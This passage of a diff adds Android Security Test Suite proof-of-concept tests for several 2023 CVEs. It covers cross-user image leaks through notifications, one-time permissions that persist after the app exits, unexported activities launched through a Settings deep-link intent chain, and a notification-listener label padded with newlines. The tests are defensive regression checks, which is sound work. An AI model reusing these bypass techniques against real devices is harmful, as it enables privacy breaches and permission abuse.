+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Check if any security exception is caught
+ int notificationId = 0;
+ try {
+ notificationManager.notify(notificationId, callNotification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not, fail the test if notification gets posted
+ assertFalse(
+ "Device is vulnerable to b/274592467 hence images belonging to another user on"
+ + " the same device can be displayed in CallStyle notifications",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification.getId() == notificationId
+ && notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
new file mode 100644
index 0000000..10d9d77
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21244",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
new file mode 100644
index 0000000..b30febc
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21244">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21244" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
new file mode 100644
index 0000000..774aa78
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
@@ -0,0 +1,170 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21244;
+
+import static android.app.NotificationManager.IMPORTANCE_DEFAULT;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.RemoteInputHistoryItem;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private static final String TAG = "CVE-2023-21244";
+
+ @Test
+ public void testCVE_2023_21244() {
+ try {
+ // Get the user id of "cve_2023_21244_user" created in testPocCVE_2023_21244()
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ UserManager userManager =
+ context.getSystemService(UserManager.class);
+ List<UserInfo> users = userManager.getUsers();
+ int userId = -1;
+ for (UserInfo user : users) {
+ if (user.name.equals("cve_2023_21244_user")) {
+ userId = user.id;
+ break;
+ }
+ }
+ return userId;
+ },
+ android.Manifest.permission.CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21244_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21244.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
+ } catch (IOException e) {
+ Log.i(TAG, "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Prepare the notification builder with the remote input history containing the
+ // secondary user's image
+ final String channelId = "CVE_2023_20913_channel";
+ Notification.Builder builder =
+ new Notification.Builder(context, channelId)
+ .setChannelId(channelId)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */));
+ RemoteInputHistoryItem remoteInputHistoryItems[] = {
+ new RemoteInputHistoryItem(
+ "image/*" /* mime type */,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId),
+ "cve_2023_21244_text" /* backup text */)
+ };
+ builder.setRemoteInputHistory(remoteInputHistoryItems);
+
+ // Send the notification
+ final int notificationId = 1;
+ NotificationManager nmgr = context.getSystemService(NotificationManager.class);
+ nmgr.createNotificationChannel(
+ new NotificationChannel(channelId, channelId, IMPORTANCE_DEFAULT));
+ try {
+ nmgr.notify(notificationId, builder.build());
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(imagesContentUri)) {
+ // Ignore as this is expected with fix and the test should pass so exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not. On a vulnerable device, the notification
+ // containing other users' image will get posted, hence fail the test else the test will
+ // pass.
+ assertFalse(
+ "Device is vulnerable to b/276729064 hence images belonging to another user on"
+ + " the same device can be displayed in notification by setting it as"
+ + " a part of remote input history",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ nmgr.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification.getId() == notificationId
+ && notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
new file mode 100644
index 0000000..e8ef246
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21254-helper",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "helper-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "helper-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21254-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.uiautomator_uiautomator",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..8bbf9e8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21254_helper">
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+ <application>
+ <activity android:name=".PocActivity"
+ android:exported="true" />
+ </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
new file mode 100644
index 0000000..3d3b2f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_helper;
+
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+
+import android.app.Activity;
+import android.content.pm.PackageManager;
+
+public class PocActivity extends Activity {
+ private static final int REQUEST_CODE = 1;
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ if (checkSelfPermission(RECORD_AUDIO) != PackageManager.PERMISSION_GRANTED) {
+ requestPermissions(new String[] {RECORD_AUDIO}, REQUEST_CODE);
+ }
+ }
+
+ @Override
+ public void onRequestPermissionsResult(int requestCode, String[] permissions, int[] results) {
+ super.onRequestPermissionsResult(requestCode, permissions, results);
+ if (requestCode == REQUEST_CODE
+ && permissions[0].equals(RECORD_AUDIO)
+ && results[0] == PackageManager.PERMISSION_GRANTED) {
+ // Terminate app process if one-time permission is granted
+ System.exit(REASON_USER_REQUESTED);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..d9d2502
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21254_test">
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21254_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
new file mode 100644
index 0000000..c5db133
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
@@ -0,0 +1,154 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_test;
+
+import static android.Manifest.permission.DUMP;
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+import static android.content.pm.PackageManager.PERMISSION_DENIED;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.app.ActivityManager;
+import android.app.ApplicationExitInfo;
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+import java.util.function.BooleanSupplier;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21254() {
+ try {
+ final Instrumentation instrumentation = getInstrumentation();
+ final Context context = instrumentation.getContext();
+ final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ final String helperAppPkg = "android.security.cts.CVE_2023_21254_helper";
+
+ // Revoke RECORD_AUDIO permission for helperAppPkg
+ uiAutomation.revokeRuntimePermission(helperAppPkg, RECORD_AUDIO, context.getUser());
+
+ // Wait until RECORD_AUDIO permission is revoked for helperAppPkg
+ BooleanSupplier permissionCheck =
+ new BooleanSupplier() {
+ @Override
+ public boolean getAsBoolean() {
+ PackageManager pm = context.getPackageManager();
+ return pm.checkPermission(RECORD_AUDIO, helperAppPkg)
+ == PERMISSION_DENIED;
+ }
+ };
+ assumeTrue(
+ format(
+ "%s permission is not revoked for %s package hence skipping",
+ RECORD_AUDIO, helperAppPkg),
+ poll(permissionCheck));
+
+ // Start targetActivity from helper app which will request for one-time permission
+ final String targetActivity = "android.security.cts.CVE_2023_21254_helper.PocActivity";
+ Intent intent =
+ new Intent()
+ .setClassName(helperAppPkg, targetActivity)
+ .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+ context.startActivity(intent);
+
+ // Grant one-time permission to helperAppPkg. This has dependence on UI since permission
+ // required to grant one-time permission MANAGE_ONE_TIME_PERMISSION_SESSIONS cannot be
+ // granted to test-app or used via adoptShellPermissionIdentity
+ final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+ final long uiTimeoutMs = 2_000L;
+ BySelector selector =
+ By.res(createCaseInsensitivePattern(".*permission_allow_one_time_button.*"))
+ .pkg(createCaseInsensitivePattern(".*permissioncontroller.*"));
+ assumeTrue(
+ "UI element for allowing one-time permission not found",
+ uiDevice.wait(Until.hasObject(selector), uiTimeoutMs));
+ uiDevice.findObject(selector).click();
+ // If in case GrantPermissionsActivity is launched twice due to race condition, click UI
+ // element again to grant one-time permission
+ if (!uiDevice.wait(Until.gone(selector), uiTimeoutMs)) {
+ uiDevice.findObject(selector).click();
+ }
+
+ // Wait until helperAppPkg app process is terminated
+ runWithShellPermissionIdentity(
+ () -> {
+ assumeTrue(
+ format(
+ "%s app process not terminated and hence skipping",
+ helperAppPkg),
+ poll(
+ () -> {
+ // Pass pid and maxNum as 0 to
+ // getHistoricalProcessExitReasons() in
+ // order to get all matching records for helperAppPkg.
+ final List<ApplicationExitInfo> infos =
+ context.getSystemService(ActivityManager.class)
+ .getHistoricalProcessExitReasons(
+ helperAppPkg,
+ 0 /* pid */,
+ 0 /* maxNum */);
+ for (ApplicationExitInfo info : infos) {
+ if (info.getStatus() == REASON_USER_REQUESTED) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ },
+ DUMP);
+
+ // Without fix, one-time permission for helperAppPkg is not revoked after app process
+ // terminates and hence test fails
+ assertTrue(
+ "Device is vulnerable to b/254736794!! One-time permissions can be held"
+ + " indefinitely due to activity manager bug",
+ poll(permissionCheck));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+
+ private Pattern createCaseInsensitivePattern(String pattern) {
+ return Pattern.compile(pattern, Pattern.CASE_INSENSITIVE);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
new file mode 100644
index 0000000..1f7e5c2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21256",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "Nene",
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
new file mode 100644
index 0000000..b6cdbca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21256">
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21256" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
new file mode 100644
index 0000000..31d153f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
@@ -0,0 +1,134 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21256;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import com.android.bedstead.nene.utils.Poll;
+import com.android.internal.app.PlatLogoActivity;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.time.Duration;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private UiDevice mUiDevice;
+
+ @Test
+ public void testSettingsHomePageActivityFromWorkProfile() {
+ UiAutomation uiAutomation = null;
+ try {
+ final long timeoutMs = 10_000L;
+ Instrumentation instrumentation = getInstrumentation();
+ uiAutomation = instrumentation.getUiAutomation();
+ mUiDevice = UiDevice.getInstance(instrumentation);
+ Context context = instrumentation.getContext();
+ String defaultSettingsPkg = "com.android.settings";
+ String platLogoActivityName = PlatLogoActivity.class.getName();
+ String dumpsysActivityCmd = "dumpsys activity " + platLogoActivityName;
+
+ // Retrieve Settings app's package name
+ uiAutomation.adoptShellPermissionIdentity(
+ android.Manifest.permission.INTERACT_ACROSS_USERS);
+ ResolveInfo info =
+ context.getPackageManager()
+ .resolveActivityAsUser(
+ new Intent(Settings.ACTION_SETTINGS),
+ PackageManager.MATCH_SYSTEM_ONLY,
+ UserHandle.USER_SYSTEM);
+ if (info != null && info.activityInfo != null) {
+ defaultSettingsPkg = info.activityInfo.packageName;
+ }
+
+ // Attempt to launch PlatLogoActivity using Settings app
+ Intent intent =
+ Intent.createChooser(
+ new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+ .setClassName(
+ defaultSettingsPkg,
+ defaultSettingsPkg
+ + ".homepage.SettingsHomepageActivity")
+ .putExtra(
+ Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+ new Intent(Intent.ACTION_CHOOSER)
+ .toUri(Intent.URI_INTENT_SCHEME))
+ .putExtra(
+ Intent.EXTRA_INTENT,
+ new Intent()
+ .setClassName("android", platLogoActivityName))
+ .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK),
+ "chooserTitle");
+ context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Click Settings from ChooserActivity
+ String settingsText = "Settings";
+ assumeTrue(mUiDevice.wait(Until.hasObject(By.text(settingsText)), timeoutMs));
+ mUiDevice.findObject(By.text(settingsText)).click();
+
+ Pattern resumedTruePattern =
+ Pattern.compile(".*mResumed=true.*", Pattern.CASE_INSENSITIVE);
+
+ // Wait for dumpsys result to update
+ Poll.forValue(
+ () ->
+ resumedTruePattern
+ .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+ .find())
+ .toBeEqualTo(true)
+ .timeout(Duration.ofMillis(timeoutMs))
+ .await();
+
+ // Fail test if PlatLogoActivity was launched
+ assertFalse(
+ "Device is vulnerable to b/250589026, Unexported activities can be launched"
+ + "using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY from a workProfile",
+ resumedTruePattern
+ .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+ .find());
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ mUiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
new file mode 100644
index 0000000..454f3c5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21260",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "src/**/*.java"
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
new file mode 100644
index 0000000..016907d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21260">
+ <!-- Added '__' prefix to label to make the app appear at the top of list in settings -->
+ <application android:label="__CVE_2023_21260">
+ <service android:name=".TestListener"
+ android:label="\n\nCVE_2023_21260_TestListener_BugPresent"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.service.notification.NotificationListenerService" />
+ </intent-filter>
+ </service>
+ </application>
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21260" />
+</manifest>
